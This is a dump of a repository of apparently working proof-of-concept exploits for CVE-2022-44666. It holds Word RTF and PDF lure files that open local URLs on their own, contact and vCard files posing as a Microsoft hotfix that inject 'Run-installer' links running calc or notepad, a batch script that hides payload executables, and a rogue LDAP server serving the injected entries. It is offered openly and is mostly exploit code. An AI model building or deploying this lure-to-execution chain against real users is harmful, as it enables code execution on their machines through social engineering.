ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 15 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e007400 16 | 
72007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000c6ad98892f1d411a65f0040963251e500 17 | 000000000000000000000040e84f40667fd80103000000c00200000000000001004f006c006500000000000000000000000000000000000000000000000000000000000000000000000000000000000000 18 | 00000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000800100000000000003004f 19 | 0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff00000000 20 | 000000000000000000000000000000000000000000000000000000000000000006000000060000000000000003004c0069006e006b0049006e0066006f0000000000000000000000000000000000000000 21 | 00000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000000000000000000700 22 | 000040010000000000000100000002000000030000000400000005000000fefffffffeffffff08000000090000000a000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 23 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 24 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 25 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 26 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 27 | 
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 28 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020900000001000000000000002a0000000403000000000000c0000000000000460200000020000c0000 29 | 005f3137313534393137353500000000009d0000000903000000000000c00000000000004602000000e0c9ea79f9bace118c8200aa004ba90b5600000068007400740070003a002f002f003100320037002e0030002e0030002e0031003a0038003000380031002f0070006f0063002e00680074006d006c000000795881f43b1d7f48af2c825dc485276300000000a5ab00030403000000000000c00000 30 | 00000000460200000020000100000000ffffffff0000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100003000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002300 31 | 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} 32 | {\result {\rtlch\fcs1 \af31507 \ltrch\fcs0 \insrsid1979324}}}}} 33 | -------------------------------------------------------------------------------- /further-pocs/MSWord/remote-weaponized-by-searchms/exploit.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/further-pocs/MSWord/remote-weaponized-by-searchms/exploit.docx -------------------------------------------------------------------------------- /further-pocs/MSWord/remote-weaponized-by-searchms/exploit.rtf: -------------------------------------------------------------------------------- 1 | 
{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe2052\themelang1033\themelangfe2052\themelangcs0{ 2 | {\object\objautlink\rsltpict\objw1440\objh1439{\*\objclass http://127.0.0.1:8081/poc.html}{\*\oleclsid \'7b00000300-0000-0000-C000-000000000046\'7d}{\*\objdata 0105000002000000090000004f4c45324c696e6b 3 | 000000000000000000000c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000 4 | feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 5 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 6 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 7 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 8 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 9 | fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffdfffffffefffffffeffffff04000000feffffffffffffffffffffffffffffffffffffffffffffffffff 10 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 11 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 12 | 
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 13 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 14 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 15 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e007400 16 | 72007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000c6ad98892f1d411a65f0040963251e500 17 | 000000000000000000000040e84f40667fd80103000000c00200000000000001004f006c006500000000000000000000000000000000000000000000000000000000000000000000000000000000000000 18 | 00000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000800100000000000003004f 19 | 0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff00000000 20 | 000000000000000000000000000000000000000000000000000000000000000006000000060000000000000003004c0069006e006b0049006e0066006f0000000000000000000000000000000000000000 21 | 00000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000000000000000000700 22 | 000040010000000000000100000002000000030000000400000005000000fefffffffeffffff08000000090000000a000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 23 | 
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 24 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 25 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 26 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 27 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 28 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020900000001000000000000002a0000000403000000000000c0000000000000460200000020000c0000 29 | 005f3137313534393137353500000000009d0000000903000000000000c00000000000004602000000e0c9ea79f9bace118c8200aa004ba90b5600000068007400740070003a002f002f003100320037002e0030002e0030002e0031003a0038003000380031002f0070006f0063002e00680074006d006c000000795881f43b1d7f48af2c825dc485276300000000a5ab00030403000000000000c00000 30 | 00000000460200000020000100000000ffffffff0000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100003000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002300 31 | 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} 32 | {\result {\rtlch\fcs1 \af31507 \ltrch\fcs0 \insrsid1979324}}}}} 33 | 
-------------------------------------------------------------------------------- /further-pocs/MSWord/remote-weaponized-by-searchms/poc.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 127 | 128 | -------------------------------------------------------------------------------- /further-pocs/MSWord/setup-hidden.bat: -------------------------------------------------------------------------------- 1 | attrib +s +h +r hidden\payload.bin 2 | attrib +s +h +r hidden\payload.exe 3 | attrib +s +h +r hidden\payload.lnk 4 | attrib +s +h +r hidden -------------------------------------------------------------------------------- /further-pocs/MSWord/url-protocol-ldap/exploit.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/further-pocs/MSWord/url-protocol-ldap/exploit.docx -------------------------------------------------------------------------------- /further-pocs/MSWord/url-protocol-ldap/exploit.rtf: -------------------------------------------------------------------------------- 1 | {\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe2052\themelang1033\themelangfe2052\themelangcs0{ 2 | {\object\objautlink\rsltpict\objw1440\objh1439{\*\objclass http://127.0.0.1:8081/poc.html}{\*\oleclsid \'7b00000300-0000-0000-C000-000000000046\'7d}{\*\objdata 0105000002000000090000004f4c45324c696e6b 3 | 000000000000000000000c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000 4 | feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 5 | 
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 6 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 7 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 8 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 9 | fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffdfffffffefffffffeffffff04000000feffffffffffffffffffffffffffffffffffffffffffffffffff 10 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 11 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 12 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 13 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 14 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 15 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e007400 16 | 
72007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000c6ad98892f1d411a65f0040963251e500 17 | 000000000000000000000040e84f40667fd80103000000c00200000000000001004f006c006500000000000000000000000000000000000000000000000000000000000000000000000000000000000000 18 | 00000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000800100000000000003004f 19 | 0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff00000000 20 | 000000000000000000000000000000000000000000000000000000000000000006000000060000000000000003004c0069006e006b0049006e0066006f0000000000000000000000000000000000000000 21 | 00000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000000000000000000700 22 | 000040010000000000000100000002000000030000000400000005000000fefffffffeffffff08000000090000000a000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 23 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 24 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 25 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 26 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 27 | 
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 28 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020900000001000000000000002a0000000403000000000000c0000000000000460200000020000c0000 29 | 005f3137313534393137353500000000009d0000000903000000000000c00000000000004602000000e0c9ea79f9bace118c8200aa004ba90b5600000068007400740070003a002f002f003100320037002e0030002e0030002e0031003a0038003000380031002f0070006f0063002e00680074006d006c000000795881f43b1d7f48af2c825dc485276300000000a5ab00030403000000000000c00000 30 | 00000000460200000020000100000000ffffffff0000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100003000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002300 31 | 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} 32 | {\result {\rtlch\fcs1 \af31507 \ltrch\fcs0 \insrsid1979324}}}}} 33 | -------------------------------------------------------------------------------- /further-pocs/MSWord/url-protocol-ldap/poc.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 127 | 128 | 129 | -------------------------------------------------------------------------------- /further-pocs/PDFreaders/poc/KB5014666-hotfix.contact: -------------------------------------------------------------------------------- 1 | 2 | 3 | 2022-07-25T09:36:02Z 4 | 5 | 6 | 7 | 4b736c6d-6b7e-40bf-8283-6dbd3ff7625e 8 | 9 | 10 | 11 | 12 | SMTP 13 | "></a><a href="notepad">Run-installer </a> 14 | 15 | Preferred 16 | 17 | 18 | 19 | 20 | 21 | 22 | Microsoft KB5014666-hotfix 23 | 
Microsoft 24 | Microsoft 25 | 26 | 27 | 28 | 29 | 000-000-0000 30 | 31 | Voice 32 | Business 33 | 34 | 35 | 36 | 000-000-0000 37 | 38 | Cellular 39 | 40 | 41 | 42 | 000-000-0000 43 | 44 | Voice 45 | Personal 46 | 47 | 48 | 49 | 50 | 51 | "></a><a href="calc">Run-installer </a> 52 | 53 | Business 54 | 55 | 56 | 57 | "></a><a href="notepad">Run-installer </a> 58 | 59 | Personal 60 | 61 | 62 | 63 | 64 | 65 | Microsoft Hotfix 66 | Microsoft Corporation 67 | 68 | Business 69 | 70 | 71 | 72 | 73 | 74 | 75 | UserTile 76 | 77 | 78 | 79 | 80 | -------------------------------------------------------------------------------- /further-pocs/PDFreaders/poc/KB5014666-hotfix.vcf: -------------------------------------------------------------------------------- 1 | BEGIN:VCARD 2 | VERSION:2.1 3 | N;LANGUAGE=en-us:Microsoft 4 | FN:Microsoft 5 | NICKNAME: Microsoft KB5014666-hotfix 6 | ORG:Microsoft Corporation 7 | TITLE:Microsoft Hotfix 8 | TEL;WORK;VOICE:000-000-0000 9 | TEL;HOME;VOICE:000-000-0000 10 | TEL;CELL;VOICE:000-000-0000 11 | EMAIL;PREF;INTERNET:">Run-installer 12 | URL;WORK:">Run-installer 13 | URL;TYPE=HOME:">Run-installer 14 | END:VCARD -------------------------------------------------------------------------------- /further-pocs/PDFreaders/poc/poc-contact.pdf: -------------------------------------------------------------------------------- 1 | %PDF-1.1 2 | 3 | 1 0 obj 4 | << 5 | /Type /Catalog 6 | /Outlines 2 0 R 7 | /Pages 3 0 R 8 | /OpenAction 7 0 R 9 | >> 10 | endobj 11 | 12 | 2 0 obj 13 | << 14 | /Type /Outlines 15 | /Count 0 16 | >> 17 | endobj 18 | 19 | 3 0 obj 20 | << 21 | /Type /Pages 22 | /Kids [4 0 R] 23 | /Count 1 24 | >> 25 | endobj 26 | 27 | 4 0 obj 28 | << 29 | /Type /Page 30 | /Parent 3 0 R 31 | /MediaBox [0 0 612 792] 32 | /Contents 5 0 R 33 | /Resources << 34 | /ProcSet [/PDF /Text] 35 | /Font << /F1 6 0 R >> 36 | >> 37 | >> 38 | endobj 39 | 40 | 5 0 obj 41 | << /Length 56 >> 42 | stream 43 | BT /F1 12 Tf 100 700 Td 15 TL (PDF JavaScript fuzzer) Tj ET 
44 | endstream 45 | endobj 46 | 47 | 6 0 obj 48 | << 49 | /Type /Font 50 | /Subtype /Type1 51 | /Name /F1 52 | /BaseFont /Helvetica 53 | /Encoding /MacRomanEncoding 54 | >> 55 | endobj 56 | 57 | 7 0 obj 58 | << 59 | /Type /Action 60 | /S /JavaScript 61 | /JS ( 62 | app.launchURL("http://127.0.0.1:8081/KB5014666-hotfix.contact"); // For both Readers. 63 | ) 64 | >> 65 | endobj 66 | 67 | xref 68 | 0 8 69 | 0000000000 65535 f 70 | 0000000012 00000 n 71 | 0000000109 00000 n 72 | 0000000165 00000 n 73 | 0000000234 00000 n 74 | 0000000439 00000 n 75 | 0000000553 00000 n 76 | 0000000677 00000 n 77 | trailer 78 | << 79 | /Size 8 80 | /Root 1 0 R 81 | >> 82 | startxref 83 | 837 84 | %%EOF 85 | 86 | -------------------------------------------------------------------------------- /further-pocs/PDFreaders/poc/poc-vcf.pdf: -------------------------------------------------------------------------------- 1 | %PDF-1.1 2 | 3 | 1 0 obj 4 | << 5 | /Type /Catalog 6 | /Outlines 2 0 R 7 | /Pages 3 0 R 8 | /OpenAction 7 0 R 9 | >> 10 | endobj 11 | 12 | 2 0 obj 13 | << 14 | /Type /Outlines 15 | /Count 0 16 | >> 17 | endobj 18 | 19 | 3 0 obj 20 | << 21 | /Type /Pages 22 | /Kids [4 0 R] 23 | /Count 1 24 | >> 25 | endobj 26 | 27 | 4 0 obj 28 | << 29 | /Type /Page 30 | /Parent 3 0 R 31 | /MediaBox [0 0 612 792] 32 | /Contents 5 0 R 33 | /Resources << 34 | /ProcSet [/PDF /Text] 35 | /Font << /F1 6 0 R >> 36 | >> 37 | >> 38 | endobj 39 | 40 | 5 0 obj 41 | << /Length 56 >> 42 | stream 43 | BT /F1 12 Tf 100 700 Td 15 TL (PDF JavaScript fuzzer) Tj ET 44 | endstream 45 | endobj 46 | 47 | 6 0 obj 48 | << 49 | /Type /Font 50 | /Subtype /Type1 51 | /Name /F1 52 | /BaseFont /Helvetica 53 | /Encoding /MacRomanEncoding 54 | >> 55 | endobj 56 | 57 | 7 0 obj 58 | << 59 | /Type /Action 60 | /S /JavaScript 61 | /JS ( 62 | app.launchURL("http://127.0.0.1:8081/KB5014666-hotfix.vcf"); // For both Readers. 
63 | ) 64 | >> 65 | endobj 66 | 67 | xref 68 | 0 8 69 | 0000000000 65535 f 70 | 0000000012 00000 n 71 | 0000000109 00000 n 72 | 0000000165 00000 n 73 | 0000000234 00000 n 74 | 0000000439 00000 n 75 | 0000000553 00000 n 76 | 0000000677 00000 n 77 | trailer 78 | << 79 | /Size 8 80 | /Root 1 0 R 81 | >> 82 | startxref 83 | 837 84 | %%EOF 85 | 86 | -------------------------------------------------------------------------------- /further-pocs/PDFreaders/remote-weaponized-by-searchms/exploit.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /further-pocs/PDFreaders/remote-weaponized-by-searchms/exploit.pdf: -------------------------------------------------------------------------------- 1 | %PDF-1.1 2 | 3 | 1 0 obj 4 | << 5 | /Type /Catalog 6 | /Outlines 2 0 R 7 | /Pages 3 0 R 8 | /OpenAction 7 0 R 9 | >> 10 | endobj 11 | 12 | 2 0 obj 13 | << 14 | /Type /Outlines 15 | /Count 0 16 | >> 17 | endobj 18 | 19 | 3 0 obj 20 | << 21 | /Type /Pages 22 | /Kids [4 0 R] 23 | /Count 1 24 | >> 25 | endobj 26 | 27 | 4 0 obj 28 | << 29 | /Type /Page 30 | /Parent 3 0 R 31 | /MediaBox [0 0 612 792] 32 | /Contents 5 0 R 33 | /Resources << 34 | /ProcSet [/PDF /Text] 35 | /Font << /F1 6 0 R >> 36 | >> 37 | >> 38 | endobj 39 | 40 | 5 0 obj 41 | << /Length 56 >> 42 | stream 43 | BT /F1 12 Tf 100 700 Td 15 TL (PDF JavaScript fuzzer) Tj ET 44 | endstream 45 | endobj 46 | 47 | 6 0 obj 48 | << 49 | /Type /Font 50 | /Subtype /Type1 51 | /Name /F1 52 | /BaseFont /Helvetica 53 | /Encoding /MacRomanEncoding 54 | >> 55 | endobj 56 | 57 | 7 0 obj 58 | << 59 | /Type /Action 60 | /S /JavaScript 61 | /JS ( 62 | app.launchURL("http://127.0.0.1:8081/exploit.html"); // For both Readers. 
63 | ) 64 | >> 65 | endobj 66 | 67 | xref 68 | 0 8 69 | 0000000000 65535 f 70 | 0000000012 00000 n 71 | 0000000109 00000 n 72 | 0000000165 00000 n 73 | 0000000234 00000 n 74 | 0000000439 00000 n 75 | 0000000553 00000 n 76 | 0000000677 00000 n 77 | trailer 78 | << 79 | /Size 8 80 | /Root 1 0 R 81 | >> 82 | startxref 83 | 837 84 | %%EOF 85 | 86 | -------------------------------------------------------------------------------- /further-pocs/PDFreaders/url-protocol-ldap/exploit.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /further-pocs/PDFreaders/url-protocol-ldap/exploit.pdf: -------------------------------------------------------------------------------- 1 | %PDF-1.1 2 | 3 | 1 0 obj 4 | << 5 | /Type /Catalog 6 | /Outlines 2 0 R 7 | /Pages 3 0 R 8 | /OpenAction 7 0 R 9 | >> 10 | endobj 11 | 12 | 2 0 obj 13 | << 14 | /Type /Outlines 15 | /Count 0 16 | >> 17 | endobj 18 | 19 | 3 0 obj 20 | << 21 | /Type /Pages 22 | /Kids [4 0 R] 23 | /Count 1 24 | >> 25 | endobj 26 | 27 | 4 0 obj 28 | << 29 | /Type /Page 30 | /Parent 3 0 R 31 | /MediaBox [0 0 612 792] 32 | /Contents 5 0 R 33 | /Resources << 34 | /ProcSet [/PDF /Text] 35 | /Font << /F1 6 0 R >> 36 | >> 37 | >> 38 | endobj 39 | 40 | 5 0 obj 41 | << /Length 56 >> 42 | stream 43 | BT /F1 12 Tf 100 700 Td 15 TL (PDF JavaScript fuzzer) Tj ET 44 | endstream 45 | endobj 46 | 47 | 6 0 obj 48 | << 49 | /Type /Font 50 | /Subtype /Type1 51 | /Name /F1 52 | /BaseFont /Helvetica 53 | /Encoding /MacRomanEncoding 54 | >> 55 | endobj 56 | 57 | 7 0 obj 58 | << 59 | /Type /Action 60 | /S /JavaScript 61 | /JS ( 62 | //app.launchURL("ldap://127.0.0.1:389/cn=Microsoft,ou=people,dc=example,dc=org"); // For Foxit Reader. 63 | app.launchURL("http://127.0.0.1:8081/exploit.html"); // For both Readers. 
64 | ) 65 | >> 66 | endobj 67 | 68 | xref 69 | 0 8 70 | 0000000000 65535 f 71 | 0000000012 00000 n 72 | 0000000109 00000 n 73 | 0000000165 00000 n 74 | 0000000234 00000 n 75 | 0000000439 00000 n 76 | 0000000553 00000 n 77 | 0000000677 00000 n 78 | trailer 79 | << 80 | /Size 8 81 | /Root 1 0 R 82 | >> 83 | startxref 84 | 837 85 | %%EOF 86 | 87 | -------------------------------------------------------------------------------- /further-pocs/browsers/poc/KB5014666-hotfix.contact: -------------------------------------------------------------------------------- 1 | 2 | 3 | 2022-07-25T09:36:02Z 4 | 5 | 6 | 7 | 4b736c6d-6b7e-40bf-8283-6dbd3ff7625e 8 | 9 | 10 | 11 | 12 | SMTP 13 | "></a><a href="notepad">Run-installer </a> 14 | 15 | Preferred 16 | 17 | 18 | 19 | 20 | 21 | 22 | Microsoft KB5014666-hotfix 23 | Microsoft 24 | Microsoft 25 | 26 | 27 | 28 | 29 | 000-000-0000 30 | 31 | Voice 32 | Business 33 | 34 | 35 | 36 | 000-000-0000 37 | 38 | Cellular 39 | 40 | 41 | 42 | 000-000-0000 43 | 44 | Voice 45 | Personal 46 | 47 | 48 | 49 | 50 | 51 | "></a><a href="calc">Run-installer </a> 52 | 53 | Business 54 | 55 | 56 | 57 | "></a><a href="notepad">Run-installer </a> 58 | 59 | Personal 60 | 61 | 62 | 63 | 64 | 65 | Microsoft Hotfix 66 | Microsoft Corporation 67 | 68 | Business 69 | 70 | 71 | 72 | 73 | 74 | 75 | UserTile 76 | 77 | 78 | 79 | 80 | -------------------------------------------------------------------------------- /further-pocs/browsers/poc/KB5014666-hotfix.vcf: -------------------------------------------------------------------------------- 1 | BEGIN:VCARD 2 | VERSION:2.1 3 | N;LANGUAGE=en-us:Microsoft 4 | FN:Microsoft 5 | NICKNAME: Microsoft KB5014666-hotfix 6 | ORG:Microsoft Corporation 7 | TITLE:Microsoft Hotfix 8 | TEL;WORK;VOICE:000-000-0000 9 | TEL;HOME;VOICE:000-000-0000 10 | TEL;CELL;VOICE:000-000-0000 11 | EMAIL;PREF;INTERNET:">Run-installer 12 | URL;WORK:">Run-installer 13 | URL;TYPE=HOME:">Run-installer 14 | END:VCARD 
-------------------------------------------------------------------------------- /further-pocs/browsers/poc/poc-contact.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /further-pocs/browsers/poc/poc-vcf.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /further-pocs/browsers/remote-weaponized-by-searchms/exploit.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /further-pocs/browsers/url-protocol-ldap/exploit.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /further-pocs/ldap-rogue-server/ldap-server.py: -------------------------------------------------------------------------------- 1 | # LDAP Rogue Server. Sample taken from https://ldaptor.readthedocs.io/en/latest/quickstart.html#ldap-server-quick-start 2 | # Fully tested with Python 2.7. To run, install the package from pip: pip install ldaptor. 
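# URL protocol example => ldap://127.0.0.1:389/cn=Microsoft,ou=people,dc=example,dc=org

import sys
import io

from twisted.application import service
from twisted.internet.endpoints import serverFromString
from twisted.internet.protocol import ServerFactory
from twisted.python.components import registerAdapter
from twisted.python import log
from ldaptor.inmemory import fromLDIFFile
from ldaptor.interfaces import IConnectedLDAPEntry
from ldaptor.protocols.ldap.ldapserver import LDAPServer

# Directory content served by this test server. The two person entries carry
# the test strings in their mail/url/wwwhomepage attributes; the client-side
# renderer of those attributes is what the PoC exercises, so these attribute
# values are the ones a detection rule or a fixed client should be checked
# against. NOTE(review): the `">Run-installer` values look truncated compared
# with the `.contact` files elsewhere in the repository (which still show the
# surrounding anchor markup) -- compare against the upstream file before use.
LDIF = b"""\
dn: dc=org
dc: org
objectClass: dcObject

dn: dc=example,dc=org
dc: example
objectClass: dcObject
objectClass: organization

dn: ou=people,dc=example,dc=org
objectClass: organizationalUnit
ou: people

dn: cn=Microsoft,ou=people,dc=example,dc=org
cn: Microsoft
gn: Microsoft
company: Microsoft
title: Microsoft KB5001337-hotfix
mail:">Run-installer
url:">Run-installer
wwwhomepage:">Run-installer
objectclass: top
objectclass: person
objectClass: inetOrgPerson

dn: cn=PoC,ou=people,dc=example,dc=org
cn: PoC
gn: Microsoft
company: Microsoft
title: Microsoft KB5014666-hotfix
mail:">Run-installer
url:">Run-installer
wwwhomepage:">Run-installer
objectclass: top
objectclass: person
objectClass: inetOrgPerson

"""


class Tree:
    """In-memory directory tree parsed from LDIF text.

    ``self.db`` holds the root entry returned by ``fromLDIFFile``. It is
    assigned from a Deferred callback, so it is ``None`` until that callback
    has fired. For an in-memory BytesIO source this appears to complete
    before ``__init__`` returns, which is what the ``__main__`` block relies
    on when it reads ``tree.db`` immediately -- TODO confirm.
    """

    def __init__(self, ldif=None):
        # ldif: raw LDIF bytes. Defaults to the module-level LDIF so the
        # existing call ``Tree()`` behaves exactly as before; a caller may
        # pass its own bytes to serve a different tree.
        if ldif is None:
            ldif = LDIF
        self.db = None  # populated by ldifRead
        self.f = io.BytesIO(ldif)
        d = fromLDIFFile(self.f)
        d.addCallback(self.ldifRead)
        # Without an errback a parse failure would sit in an unhandled
        # Deferred and only surface (if at all) at garbage collection;
        # route it to the twisted log so a malformed LDIF is visible.
        d.addErrback(log.err)

    def ldifRead(self, result):
        """Callback for fromLDIFFile: keep the parsed root entry and release
        the BytesIO buffer it was read from."""
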